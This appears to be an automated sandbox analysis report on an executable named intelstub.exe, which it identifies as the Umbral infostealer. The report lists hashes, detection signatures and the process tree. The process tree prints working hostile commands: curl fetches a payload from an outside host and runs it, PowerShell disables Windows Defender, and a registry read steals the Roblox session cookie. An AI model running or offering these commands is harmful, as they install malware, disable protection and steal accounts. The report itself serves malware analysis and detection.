Resubmissions
08-12-2024 02:44
241208-c76qvsykax 1008-12-2024 02:42
241208-c7bwgstldm 1008-12-2024 02:40
241208-c6dcxstlal 1008-12-2024 02:37
241208-c4lxaaxrcv 10Analysis
-
max time kernel
99s -
max time network
101s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
08-12-2024 02:37
Static task
static1
Behavioral task
behavioral1
Sample
intelstub.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
intelstub.exe
-
Size
45KB
-
MD5
46dad3f34a1ff25b259446bac02cca4a
-
SHA1
08be9e8701d40bb0d968106793480eeb25adeb26
-
SHA256
9bf776f889b56b90ef2cbe8cd971c68290f79374b7a7dcfa100e71a1cd45bd03
-
SHA512
67338468551bc926a88b8e40f40177dea339debd701ad463f9e2cb763cf82f755743f3ee82c3626aa326c820afb93020d0d9526fc38affcb9b3af92725b393f6
-
SSDEEP
768:R4yvRGAc8gygFxLgkzLQgzcOybPofSzVxsBKfwJlVE3iPmbL52:9c8Oxz8YcO+A6zV4Kfd7
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x002b000000045033-13.dat family_umbral behavioral1/memory/4708-15-0x000002707C990000-0x000002707C9D0000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5044 powershell.exe 1132 powershell.exe 4676 powershell.exe 3620 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4708 IntelSoftwareAssetManagerService.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com 16 ipinfo.io 17 ipinfo.io -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\IME\zvcjd0.pfx curl.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4552 wmic.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 4540 wmic.exe 4540 wmic.exe 4540 wmic.exe 4540 wmic.exe 4708 IntelSoftwareAssetManagerService.exe 872 wmic.exe 872 wmic.exe 872 wmic.exe 872 wmic.exe 4708 IntelSoftwareAssetManagerService.exe 5044 powershell.exe 5044 powershell.exe 1132 powershell.exe 1132 powershell.exe 4676 powershell.exe 4676 powershell.exe 4740 powershell.exe 4740 powershell.exe 3152 wmic.exe 3152 wmic.exe 3152 wmic.exe 3152 wmic.exe 5068 wmic.exe 5068 wmic.exe 5068 wmic.exe 5068 wmic.exe 5016 wmic.exe 5016 wmic.exe 5016 wmic.exe 5016 wmic.exe 3620 powershell.exe 3620 powershell.exe 4552 wmic.exe 4552 wmic.exe 4552 wmic.exe 4552 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4540 wmic.exe Token: SeSecurityPrivilege 4540 wmic.exe Token: SeTakeOwnershipPrivilege 4540 wmic.exe Token: SeLoadDriverPrivilege 4540 wmic.exe Token: SeSystemProfilePrivilege 4540 wmic.exe Token: SeSystemtimePrivilege 4540 wmic.exe Token: SeProfSingleProcessPrivilege 4540 wmic.exe Token: SeIncBasePriorityPrivilege 4540 wmic.exe Token: SeCreatePagefilePrivilege 4540 wmic.exe Token: SeBackupPrivilege 4540 wmic.exe Token: SeRestorePrivilege 4540 wmic.exe Token: SeShutdownPrivilege 4540 wmic.exe Token: SeDebugPrivilege 4540 wmic.exe Token: SeSystemEnvironmentPrivilege 4540 wmic.exe Token: SeRemoteShutdownPrivilege 4540 wmic.exe Token: SeUndockPrivilege 4540 wmic.exe Token: SeManageVolumePrivilege 4540 wmic.exe Token: 33 4540 wmic.exe Token: 34 4540 wmic.exe Token: 35 4540 wmic.exe Token: 36 4540 wmic.exe Token: SeIncreaseQuotaPrivilege 4540 wmic.exe Token: SeSecurityPrivilege 4540 wmic.exe Token: SeTakeOwnershipPrivilege 4540 wmic.exe Token: SeLoadDriverPrivilege 4540 wmic.exe Token: SeSystemProfilePrivilege 4540 wmic.exe Token: SeSystemtimePrivilege 4540 wmic.exe Token: SeProfSingleProcessPrivilege 4540 wmic.exe Token: SeIncBasePriorityPrivilege 4540 wmic.exe Token: SeCreatePagefilePrivilege 4540 wmic.exe Token: SeBackupPrivilege 4540 wmic.exe Token: SeRestorePrivilege 4540 wmic.exe Token: SeShutdownPrivilege 4540 wmic.exe Token: SeDebugPrivilege 4540 wmic.exe Token: SeSystemEnvironmentPrivilege 4540 wmic.exe Token: SeRemoteShutdownPrivilege 4540 wmic.exe Token: SeUndockPrivilege 4540 wmic.exe Token: SeManageVolumePrivilege 4540 wmic.exe Token: 33 4540 wmic.exe Token: 34 4540 wmic.exe Token: 35 4540 wmic.exe Token: 36 4540 wmic.exe Token: SeDebugPrivilege 4708 IntelSoftwareAssetManagerService.exe Token: SeIncreaseQuotaPrivilege 872 wmic.exe Token: SeSecurityPrivilege 872 wmic.exe Token: SeTakeOwnershipPrivilege 872 wmic.exe Token: SeLoadDriverPrivilege 872 wmic.exe Token: SeSystemProfilePrivilege 872 wmic.exe Token: SeSystemtimePrivilege 872 wmic.exe Token: SeProfSingleProcessPrivilege 872 wmic.exe Token: SeIncBasePriorityPrivilege 872 wmic.exe Token: SeCreatePagefilePrivilege 872 wmic.exe Token: SeBackupPrivilege 872 wmic.exe Token: SeRestorePrivilege 872 wmic.exe Token: SeShutdownPrivilege 872 wmic.exe Token: SeDebugPrivilege 872 wmic.exe Token: SeSystemEnvironmentPrivilege 872 wmic.exe Token: SeRemoteShutdownPrivilege 872 wmic.exe Token: SeUndockPrivilege 872 wmic.exe Token: SeManageVolumePrivilege 872 wmic.exe Token: 33 872 wmic.exe Token: 34 872 wmic.exe Token: 35 872 wmic.exe Token: 36 872 wmic.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 4244 wrote to memory of 3044 4244 intelstub.exe 82 PID 4244 wrote to memory of 3044 4244 intelstub.exe 82 PID 3044 wrote to memory of 4884 3044 cmd.exe 83 PID 3044 wrote to memory of 4884 3044 cmd.exe 83 PID 4244 wrote to memory of 4456 4244 intelstub.exe 84 PID 4244 wrote to memory of 4456 4244 intelstub.exe 84 PID 4456 wrote to memory of 2344 4456 cmd.exe 85 PID 4456 wrote to memory of 2344 4456 cmd.exe 85 PID 4244 wrote to memory of 3864 4244 intelstub.exe 86 PID 4244 wrote to memory of 3864 4244 intelstub.exe 86 PID 4244 wrote to memory of 5088 4244 intelstub.exe 87 PID 4244 wrote to memory of 5088 4244 intelstub.exe 87 PID 5088 wrote to memory of 5012 5088 cmd.exe 88 PID 5088 wrote to memory of 5012 5088 cmd.exe 88 PID 4244 wrote to memory of 1608 4244 intelstub.exe 89 PID 4244 wrote to memory of 1608 4244 intelstub.exe 89 PID 1608 wrote to memory of 4708 1608 cmd.exe 90 PID 1608 wrote to memory of 4708 1608 cmd.exe 90 PID 4708 wrote to memory of 4540 4708 IntelSoftwareAssetManagerService.exe 91 PID 4708 wrote to memory of 4540 4708 IntelSoftwareAssetManagerService.exe 91 PID 4708 wrote to memory of 872 4708 IntelSoftwareAssetManagerService.exe 94 PID 4708 wrote to memory of 872 4708 IntelSoftwareAssetManagerService.exe 94 PID 4708 wrote to memory of 5044 4708 IntelSoftwareAssetManagerService.exe 96 PID 4708 wrote to memory of 5044 4708 IntelSoftwareAssetManagerService.exe 96 PID 4708 wrote to memory of 1132 4708 IntelSoftwareAssetManagerService.exe 99 PID 4708 wrote to memory of 1132 4708 IntelSoftwareAssetManagerService.exe 99 PID 4708 wrote to memory of 4676 4708 IntelSoftwareAssetManagerService.exe 101 PID 4708 wrote to memory of 4676 4708 IntelSoftwareAssetManagerService.exe 101 PID 4708 wrote to memory of 4740 4708 IntelSoftwareAssetManagerService.exe 103 PID 4708 wrote to memory of 4740 4708 IntelSoftwareAssetManagerService.exe 103 PID 4708 wrote to memory of 3152 4708 IntelSoftwareAssetManagerService.exe 107 PID 4708 wrote to memory of 3152 4708 IntelSoftwareAssetManagerService.exe 107 PID 4708 wrote to memory of 5068 4708 IntelSoftwareAssetManagerService.exe 109 PID 4708 wrote to memory of 5068 4708 IntelSoftwareAssetManagerService.exe 109 PID 4708 wrote to memory of 5016 4708 IntelSoftwareAssetManagerService.exe 111 PID 4708 wrote to memory of 5016 4708 IntelSoftwareAssetManagerService.exe 111 PID 4708 wrote to memory of 3620 4708 IntelSoftwareAssetManagerService.exe 114 PID 4708 wrote to memory of 3620 4708 IntelSoftwareAssetManagerService.exe 114 PID 4708 wrote to memory of 4552 4708 IntelSoftwareAssetManagerService.exe 116 PID 4708 wrote to memory of 4552 4708 IntelSoftwareAssetManagerService.exe 116 -
cURL User-Agent 2 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 3 curl/8.7.1 HTTP User-Agent header 13 curl/8.7.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\intelstub.exe"C:\Users\Admin\AppData\Local\Temp\intelstub.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.z60ic9762h.click/zvcjd0.pfx -o C:\Windows\IME\zvcjd0.pfx --silent2⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\system32\curl.execurl https://cdn.z60ic9762h.click/zvcjd0.pfx -o C:\Windows\IME\zvcjd0.pfx --silent3⤵
- Drops file in Windows directory
PID:4884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -importpfx -p your_password C:\Windows\IME\zvcjd0.pfx NoExport2⤵
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\system32\certutil.execertutil -importpfx -p your_password C:\Windows\IME\zvcjd0.pfx NoExport3⤵PID:2344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\IME\zvcjd0.pfx2⤵PID:3864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.z60ic9762h.click/abc.bin -o C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe --silent2⤵
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\system32\curl.execurl https://cdn.z60ic9762h.click/abc.bin -o C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe --silent3⤵PID:5012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exeC:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4740
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3152
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5068
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3620
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:4552
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD584063c0d1d9aae057e1c424279a859b9
SHA1267a2c5851b5da21dea746f0417dd4b33f051a31
SHA2568efb3b1ffff11a06d7fc95530ea8eb260de51e72cfb457cf10a6fd34c8d20ed8
SHA512ed878d9e9632e0f9ca2a644a86dd142eb91ea74403e5829dd159f225b7230b48314d52f783aff3e80180815f95cb7daebfdc0a89e4d93eb233aebb53ebc7f111
-
Filesize
948B
MD5e84201584e77775809062c523b612091
SHA132944b89ab29734ab688a0996b301255c71bce8c
SHA2563178c801eb8d2e9e616f177ab5d4baa653bbb6b44f2725f9dbc3370c674be489
SHA512b071a268d058f3e0956515c08ddc212a0c9469f02f54698b0bf44c654c75b1778d5f47c6ffcd855f8e74b7553070aba3778580d1f12fbe8d706b9ecdf3c02132
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD571d946f8535e63213c5b7c5a0f41feeb
SHA154938522f157d789d4f1344656bd943e68ea03f7
SHA2563eef0c05ebd9655d885f994c20cd17b8dd7064118fc8273be1d7085dc4a9aaa6
SHA51248869f761ad6ea639df76c65ea5efa8c16b6f3e6045471f6cfd91791a756c998e73811dd84dc80f9da7ba302b349915b8604bf99ceee20c67d32900f7a07bad1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
238KB
MD566574582c2e810055676407bdd671636
SHA171a07c0906e65524d6844aa0a65e90ee682eb6c5
SHA2565a05e0c1a7b22baaaa9268ef6f0d9a5524826fdc3871a59c5134f7354baa9346
SHA51204c5dc624009d1127319f0f32c137a4bab6b1aec10e3fd5fdad4372c8a09b8f894980834d6d0d5ee3920ccb3aa3d3e84fe6e1010b6b6dabdb6c20e2f047b5341
-
Filesize
2KB
MD5044c6ed5926cda780ca3506829585245
SHA1b958068c7f440fffd712e9a0704f5234537b22d4
SHA25621115f915d5e38fb38be88a627010d39cb7e4b0008854530e3a8fa117f45cfea
SHA5124d00d57e4f0e12c01d5455cf81f685b04b9446aa026b8579009a271dab5eacc298530625e995ff910a9cc6442392fd2098d517b86b7ad0f713f689324e5f0601